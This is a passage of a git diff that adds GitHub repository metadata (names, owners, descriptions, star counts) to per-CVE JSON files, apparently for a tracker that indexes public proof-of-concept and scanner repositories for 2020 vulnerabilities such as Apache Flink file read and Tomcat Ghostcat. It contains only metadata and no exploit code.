+ "html_url": "https:\/\/github.com\/hoanx4\/CVE-2020-17519",
+ "description": "CVE-2020-17519",
+ "fork": false,
+ "created_at": "2021-01-08T06:50:59Z",
+ "updated_at": "2021-01-11T04:37:45Z",
+ "pushed_at": "2021-01-11T04:37:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 328279952,
+ "name": "CVE-2020-17519",
+ "full_name": "murataydemir\/CVE-2020-17519",
+ "owner": {
+ "login": "murataydemir",
+ "id": 16391655,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4",
+ "html_url": "https:\/\/github.com\/murataydemir"
+ },
+ "html_url": "https:\/\/github.com\/murataydemir\/CVE-2020-17519",
+ "description": "[CVE-2020-17519] Apache Flink RESTful API Arbitrary File Read",
+ "fork": false,
+ "created_at": "2021-01-10T01:24:50Z",
+ "updated_at": "2024-06-20T12:16:18Z",
+ "pushed_at": "2021-01-10T01:26:07Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 329584924,
+ "name": "CVE-2020-17519-Exp",
+ "full_name": "radbsie\/CVE-2020-17519-Exp",
+ "owner": {
+ "login": "radbsie",
+ "id": 47312514,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47312514?v=4",
+ "html_url": "https:\/\/github.com\/radbsie"
+ },
+ "html_url": "https:\/\/github.com\/radbsie\/CVE-2020-17519-Exp",
+ "description": "CVE-2020-17519 EXP",
+ "fork": false,
+ "created_at": "2021-01-14T10:45:29Z",
+ "updated_at": "2021-01-14T10:50:34Z",
+ "pushed_at": "2021-01-14T10:46:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 330529595,
+ "name": "CVE-2020-17519-Apache-Flink",
+ "full_name": "yaunsky\/CVE-2020-17519-Apache-Flink",
+ "owner": {
+ "login": "yaunsky",
+ "id": 48243087,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48243087?v=4",
+ "html_url": "https:\/\/github.com\/yaunsky"
+ },
+ "html_url": "https:\/\/github.com\/yaunsky\/CVE-2020-17519-Apache-Flink",
+ "description": "CVE-2020-17519; Apache Flink 任意文件读取; 批量检测",
+ "fork": false,
+ "created_at": "2021-01-18T02:03:05Z",
+ "updated_at": "2021-01-18T02:14:51Z",
+ "pushed_at": "2021-01-18T02:14:28Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 342216598,
+ "name": "westone-CVE-2020-17519-scanner",
+ "full_name": "Osyanina\/westone-CVE-2020-17519-scanner",
+ "owner": {
+ "login": "Osyanina",
+ "id": 78467376,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78467376?v=4",
+ "html_url": "https:\/\/github.com\/Osyanina"
+ },
+ "html_url": "https:\/\/github.com\/Osyanina\/westone-CVE-2020-17519-scanner",
+ "description": "A vulnerability scanner that detects CVE-2020-17519 vulnerabilities.",
+ "fork": false,
+ "created_at": "2021-02-25T11:06:05Z",
+ "updated_at": "2021-03-20T07:55:36Z",
+ "pushed_at": "2021-03-20T07:55:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 357530624,
+ "name": "CVE-2020-17519",
+ "full_name": "givemefivw\/CVE-2020-17519",
+ "owner": {
+ "login": "givemefivw",
+ "id": 65514141,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65514141?v=4",
+ "html_url": "https:\/\/github.com\/givemefivw"
+ },
+ "html_url": "https:\/\/github.com\/givemefivw\/CVE-2020-17519",
+ "description": "CVE-2020-17519 Cheetah",
+ "fork": false,
+ "created_at": "2021-04-13T11:38:18Z",
+ "updated_at": "2021-04-17T03:26:50Z",
+ "pushed_at": "2021-04-17T03:26:48Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 416830075,
+ "name": "SimplesApachePathTraversal",
+ "full_name": "MrCl0wnLab\/SimplesApachePathTraversal",
+ "owner": {
+ "login": "MrCl0wnLab",
+ "id": 17049332,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17049332?v=4",
+ "html_url": "https:\/\/github.com\/MrCl0wnLab"
+ },
+ "html_url": "https:\/\/github.com\/MrCl0wnLab\/SimplesApachePathTraversal",
+ "description": "Tool check: CVE-2021-41773, CVE-2021-42013, CVE-2020-17519",
+ "fork": false,
+ "created_at": "2021-10-13T17:03:56Z",
+ "updated_at": "2024-01-30T14:01:15Z",
+ "pushed_at": "2021-10-14T21:11:44Z",
+ "stargazers_count": 60,
+ "watchers_count": 60,
+ "has_discussions": false,
+ "forks_count": 16,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2020-17519",
+ "cve-2021-41773",
+ "cve-2021-42013"
+ ],
+ "visibility": "public",
+ "forks": 16,
+ "watchers": 60,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 467441980,
+ "name": "CVE-2020-17519",
+ "full_name": "zhangweijie11\/CVE-2020-17519",
+ "owner": {
+ "login": "zhangweijie11",
+ "id": 45932753,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45932753?v=4",
+ "html_url": "https:\/\/github.com\/zhangweijie11"
+ },
+ "html_url": "https:\/\/github.com\/zhangweijie11\/CVE-2020-17519",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-08T09:19:27Z",
+ "updated_at": "2022-03-08T09:22:32Z",
+ "pushed_at": "2022-03-08T09:22:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-17523.json b/2020/CVE-2020-17523.json
new file mode 100644
index 0000000000..fd4f713e03
--- /dev/null
+++ b/2020/CVE-2020-17523.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 335552799,
+ "name": "shiro-cve-2020-17523",
+ "full_name": "jweny\/shiro-cve-2020-17523",
+ "owner": {
+ "login": "jweny",
+ "id": 26767398,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26767398?v=4",
+ "html_url": "https:\/\/github.com\/jweny"
+ },
+ "html_url": "https:\/\/github.com\/jweny\/shiro-cve-2020-17523",
+ "description": "shiro-cve-2020-17523 漏洞的两种绕过姿势分析 以及配套的漏洞环境",
+ "fork": false,
+ "created_at": "2021-02-03T08:14:03Z",
+ "updated_at": "2024-06-11T02:41:48Z",
+ "pushed_at": "2021-02-07T09:42:36Z",
+ "stargazers_count": 112,
+ "watchers_count": 112,
+ "has_discussions": false,
+ "forks_count": 14,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 14,
+ "watchers": 112,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-17527.json b/2020/CVE-2020-17527.json
new file mode 100644
index 0000000000..fd0d0016aa
--- /dev/null
+++ b/2020/CVE-2020-17527.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 336118303,
+ "name": "CVE-2020-17527-Tomcat",
+ "full_name": "forse01\/CVE-2020-17527-Tomcat",
+ "owner": {
+ "login": "forse01",
+ "id": 76189258,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76189258?v=4",
+ "html_url": "https:\/\/github.com\/forse01"
+ },
+ "html_url": "https:\/\/github.com\/forse01\/CVE-2020-17527-Tomcat",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-05T00:18:45Z",
+ "updated_at": "2023-03-23T01:16:32Z",
+ "pushed_at": "2021-02-09T03:15:08Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-17530.json b/2020/CVE-2020-17530.json
index d0c963275a..2ede15fdc0 100644
--- a/2020/CVE-2020-17530.json
+++ b/2020/CVE-2020-17530.json
@@ -182,6 +182,66 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 327634482,
+ "name": "CVE-2020-17530",
+ "full_name": "uzzzval\/CVE-2020-17530",
+ "owner": {
+ "login": "uzzzval",
+ "id": 7476462,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7476462?v=4",
+ "html_url": "https:\/\/github.com\/uzzzval"
+ },
+ "html_url": "https:\/\/github.com\/uzzzval\/CVE-2020-17530",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-01-07T14:24:08Z",
+ "updated_at": "2021-01-16T13:29:17Z",
+ "pushed_at": "2021-01-07T19:13:46Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 332394783,
+ "name": "CVE-2020-17530-s2-061",
+ "full_name": "killmonday\/CVE-2020-17530-s2-061",
+ "owner": {
+ "login": "killmonday",
+ "id": 59520081,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59520081?v=4",
+ "html_url": "https:\/\/github.com\/killmonday"
+ },
+ "html_url": "https:\/\/github.com\/killmonday\/CVE-2020-17530-s2-061",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-01-24T07:51:31Z",
+ "updated_at": "2021-01-24T08:15:39Z",
+ "pushed_at": "2021-01-24T08:15:37Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 622556599,
"name": "CVE-2020-17530",
diff --git a/2020/CVE-2020-18324.json b/2020/CVE-2020-18324.json
new file mode 100644
index 0000000000..57f69d3665
--- /dev/null
+++ b/2020/CVE-2020-18324.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 463203318,
+ "name": "CVE-2020-18324",
+ "full_name": "hamm0nz\/CVE-2020-18324",
+ "owner": {
+ "login": "hamm0nz",
+ "id": 16913167,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16913167?v=4",
+ "html_url": "https:\/\/github.com\/hamm0nz"
+ },
+ "html_url": "https:\/\/github.com\/hamm0nz\/CVE-2020-18324",
+ "description": "Exploit PoC for CVE-2020-18324",
+ "fork": false,
+ "created_at": "2022-02-24T15:38:11Z",
+ "updated_at": "2022-02-26T17:41:07Z",
+ "pushed_at": "2022-02-25T11:14:10Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-18325.json b/2020/CVE-2020-18325.json
new file mode 100644
index 0000000000..5ad5adaa0d
--- /dev/null
+++ b/2020/CVE-2020-18325.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 463915095,
+ "name": "CVE-2020-18325",
+ "full_name": "hamm0nz\/CVE-2020-18325",
+ "owner": {
+ "login": "hamm0nz",
+ "id": 16913167,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16913167?v=4",
+ "html_url": "https:\/\/github.com\/hamm0nz"
+ },
+ "html_url": "https:\/\/github.com\/hamm0nz\/CVE-2020-18325",
+ "description": "Exploit PoC for CVE-2020-18325",
+ "fork": false,
+ "created_at": "2022-02-26T17:06:09Z",
+ "updated_at": "2022-02-26T17:41:26Z",
+ "pushed_at": "2022-02-26T17:29:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-18326.json b/2020/CVE-2020-18326.json
new file mode 100644
index 0000000000..c22c51ec47
--- /dev/null
+++ b/2020/CVE-2020-18326.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 463920955,
+ "name": "CVE-2020-18326",
+ "full_name": "hamm0nz\/CVE-2020-18326",
+ "owner": {
+ "login": "hamm0nz",
+ "id": 16913167,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16913167?v=4",
+ "html_url": "https:\/\/github.com\/hamm0nz"
+ },
+ "html_url": "https:\/\/github.com\/hamm0nz\/CVE-2020-18326",
+ "description": "Exploit PoC for CVE-2020-18326",
+ "fork": false,
+ "created_at": "2022-02-26T17:30:41Z",
+ "updated_at": "2022-02-26T17:41:47Z",
+ "pushed_at": "2022-02-26T17:39:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-1937.json b/2020/CVE-2020-1937.json
new file mode 100644
index 0000000000..a1e83e18a6
--- /dev/null
+++ b/2020/CVE-2020-1937.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 327320676,
+ "name": "apache_kylin",
+ "full_name": "shanika04\/apache_kylin",
+ "owner": {
+ "login": "shanika04",
+ "id": 73774345,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73774345?v=4",
+ "html_url": "https:\/\/github.com\/shanika04"
+ },
+ "html_url": "https:\/\/github.com\/shanika04\/apache_kylin",
+ "description": "CVE-2020-1937",
+ "fork": false,
+ "created_at": "2021-01-06T13:31:20Z",
+ "updated_at": "2021-01-06T13:41:05Z",
+ "pushed_at": "2021-01-06T13:40:54Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-1938.json b/2020/CVE-2020-1938.json
index d5073b2813..ee8a3849de 100644
--- a/2020/CVE-2020-1938.json
+++ b/2020/CVE-2020-1938.json
@@ -665,6 +665,36 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 334802810,
+ "name": "CVE-2020-1938-MSF-MODULE",
+ "full_name": "acodervic\/CVE-2020-1938-MSF-MODULE",
+ "owner": {
+ "login": "acodervic",
+ "id": 57204004,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57204004?v=4",
+ "html_url": "https:\/\/github.com\/acodervic"
+ },
+ "html_url": "https:\/\/github.com\/acodervic\/CVE-2020-1938-MSF-MODULE",
+ "description": "Modified version of auxiliary\/admin\/http\/tomcat_ghostcat, it can Read any file",
+ "fork": false,
+ "created_at": "2021-02-01T01:59:17Z",
+ "updated_at": "2021-02-03T06:01:40Z",
+ "pushed_at": "2021-02-01T02:10:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 352232354,
"name": "Hacking-Vulnerability-CVE-2020-1938-Ghostcat",
@@ -695,6 +725,126 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 362151453,
+ "name": "CVE-2020-1938",
+ "full_name": "streghstreek\/CVE-2020-1938",
+ "owner": {
+ "login": "streghstreek",
+ "id": 71115159,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71115159?v=4",
+ "html_url": "https:\/\/github.com\/streghstreek"
+ },
+ "html_url": "https:\/\/github.com\/streghstreek\/CVE-2020-1938",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-04-27T14:57:30Z",
+ "updated_at": "2021-04-27T15:01:11Z",
+ "pushed_at": "2021-04-27T14:58:39Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 384971364,
+ "name": "CVE-2020-1938",
+ "full_name": "Neko-chanQwQ\/CVE-2020-1938",
+ "owner": {
+ "login": "Neko-chanQwQ",
+ "id": 83222283,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83222283?v=4",
+ "html_url": "https:\/\/github.com\/Neko-chanQwQ"
+ },
+ "html_url": "https:\/\/github.com\/Neko-chanQwQ\/CVE-2020-1938",
+ "description": "Scanner for CVE-2020-1938",
+ "fork": false,
+ "created_at": "2021-07-11T14:38:21Z",
+ "updated_at": "2021-09-11T06:43:54Z",
+ "pushed_at": "2021-07-15T14:13:10Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 396080591,
+ "name": "ghostcat",
+ "full_name": "jptr218\/ghostcat",
+ "owner": {
+ "login": "jptr218",
+ "id": 84092766,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84092766?v=4",
+ "html_url": "https:\/\/github.com\/jptr218"
+ },
+ "html_url": "https:\/\/github.com\/jptr218\/ghostcat",
+ "description": "An implementation of CVE-2020-1938",
+ "fork": false,
+ "created_at": "2021-08-14T17:32:51Z",
+ "updated_at": "2021-08-14T18:21:04Z",
+ "pushed_at": "2021-08-14T18:21:02Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 414844036,
+ "name": "CVE-2020-1938Scan",
+ "full_name": "einzbernnn\/CVE-2020-1938Scan",
+ "owner": {
+ "login": "einzbernnn",
+ "id": 77831842,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77831842?v=4",
+ "html_url": "https:\/\/github.com\/einzbernnn"
+ },
+ "html_url": "https:\/\/github.com\/einzbernnn\/CVE-2020-1938Scan",
+ "description": "-H 192.168.1.1-192.168.5.255",
+ "fork": false,
+ "created_at": "2021-10-08T04:20:43Z",
+ "updated_at": "2021-11-09T08:43:47Z",
+ "pushed_at": "2021-11-02T09:28:04Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 527251116,
"name": "CVE-2020-1938",
diff --git a/2020/CVE-2020-1956.json b/2020/CVE-2020-1956.json
new file mode 100644
index 0000000000..7abf652c35
--- /dev/null
+++ b/2020/CVE-2020-1956.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 383961985,
+ "name": "CVE-2020-1956",
+ "full_name": "b510\/CVE-2020-1956",
+ "owner": {
+ "login": "b510",
+ "id": 47598258,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47598258?v=4",
+ "html_url": "https:\/\/github.com\/b510"
+ },
+ "html_url": "https:\/\/github.com\/b510\/CVE-2020-1956",
+ "description": "CVE-2020-1956",
+ "fork": false,
+ "created_at": "2021-07-08T00:58:07Z",
+ "updated_at": "2021-07-09T01:48:32Z",
+ "pushed_at": "2021-07-09T01:48:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-21224.json b/2020/CVE-2020-21224.json
new file mode 100644
index 0000000000..4785e45767
--- /dev/null
+++ b/2020/CVE-2020-21224.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 595841041,
+ "name": "CVE-2020-21224",
+ "full_name": "5l1v3r1\/CVE-2020-21224",
+ "owner": {
+ "login": "5l1v3r1",
+ "id": 34143537,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34143537?v=4",
+ "html_url": "https:\/\/github.com\/5l1v3r1"
+ },
+ "html_url": "https:\/\/github.com\/5l1v3r1\/CVE-2020-21224",
+ "description": "浪潮ClusterEngineV4.0 远程命令执行漏洞扫描脚本。",
+ "fork": false,
+ "created_at": "2023-01-31T23:08:01Z",
+ "updated_at": "2023-07-26T01:40:58Z",
+ "pushed_at": "2021-04-04T07:56:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-21378.json b/2020/CVE-2020-21378.json
new file mode 100644
index 0000000000..0389dd8458
--- /dev/null
+++ b/2020/CVE-2020-21378.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 447941021,
+ "name": "SeaCMS-v10.1",
+ "full_name": "sukusec301\/SeaCMS-v10.1",
+ "owner": {
+ "login": "sukusec301",
+ "id": 91454678,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91454678?v=4",
+ "html_url": "https:\/\/github.com\/sukusec301"
+ },
+ "html_url": "https:\/\/github.com\/sukusec301\/SeaCMS-v10.1",
+ "description": "For code auit and CVE-2020-21378 repetition. Have fun with it!",
+ "fork": false,
+ "created_at": "2022-01-14T11:17:26Z",
+ "updated_at": "2022-01-20T14:46:24Z",
+ "pushed_at": "2022-01-14T11:25:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-23160.json b/2020/CVE-2020-23160.json
new file mode 100644
index 0000000000..7a99ab8f9f
--- /dev/null
+++ b/2020/CVE-2020-23160.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 332770347,
+ "name": "Pyrescom-Termod-PoC",
+ "full_name": "Outpost24\/Pyrescom-Termod-PoC",
+ "owner": {
+ "login": "Outpost24",
+ "id": 66684718,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66684718?v=4",
+ "html_url": "https:\/\/github.com\/Outpost24"
+ },
+ "html_url": "https:\/\/github.com\/Outpost24\/Pyrescom-Termod-PoC",
+ "description": "Pyrescom Termod proof-of-concept code for CVE-2020-23160, CVE-2020-23161 and CVE-2020-23162",
+ "fork": false,
+ "created_at": "2021-01-25T14:17:35Z",
+ "updated_at": "2021-02-02T09:20:33Z",
+ "pushed_at": "2021-02-02T09:15:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-23342.json b/2020/CVE-2020-23342.json
new file mode 100644
index 0000000000..e4cf7b93c9
--- /dev/null
+++ b/2020/CVE-2020-23342.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 363561516,
+ "name": "CVE-2020-23342",
+ "full_name": "DXY0411\/CVE-2020-23342",
+ "owner": {
+ "login": "DXY0411",
+ "id": 42259364,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42259364?v=4",
+ "html_url": "https:\/\/github.com\/DXY0411"
+ },
+ "html_url": "https:\/\/github.com\/DXY0411\/CVE-2020-23342",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-05-02T03:57:32Z",
+ "updated_at": "2021-05-02T04:01:38Z",
+ "pushed_at": "2021-05-02T04:01:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-23839.json b/2020/CVE-2020-23839.json
new file mode 100644
index 0000000000..7450494619
--- /dev/null
+++ b/2020/CVE-2020-23839.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 352824386,
+ "name": "CVE-2020-23839",
+ "full_name": "boku7\/CVE-2020-23839",
+ "owner": {
+ "login": "boku7",
+ "id": 19784872,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19784872?v=4",
+ "html_url": "https:\/\/github.com\/boku7"
+ },
+ "html_url": "https:\/\/github.com\/boku7\/CVE-2020-23839",
+ "description": "Public PoC Disclosure for CVE-2020-23839 - GetSimple CMS v3.3.16 suffers from a Reflected XSS on the Admin Login Portal",
+ "fork": false,
+ "created_at": "2021-03-30T00:39:25Z",
+ "updated_at": "2024-03-03T08:42:45Z",
+ "pushed_at": "2021-03-30T00:50:21Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-24028.json b/2020/CVE-2020-24028.json
index 4860898815..c70d0dd361 100644
--- a/2020/CVE-2020-24028.json
+++ b/2020/CVE-2020-24028.json
@@ -28,5 +28,35 @@
"watchers": 0,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 427767417,
+ "name": "CVE-2020-24028",
+ "full_name": "redteambrasil\/CVE-2020-24028",
+ "owner": {
+ "login": "redteambrasil",
+ "id": 24315084,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24315084?v=4",
+ "html_url": "https:\/\/github.com\/redteambrasil"
+ },
+ "html_url": "https:\/\/github.com\/redteambrasil\/CVE-2020-24028",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-11-13T20:37:12Z",
+ "updated_at": "2021-11-13T20:38:34Z",
+ "pushed_at": "2021-11-13T20:38:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
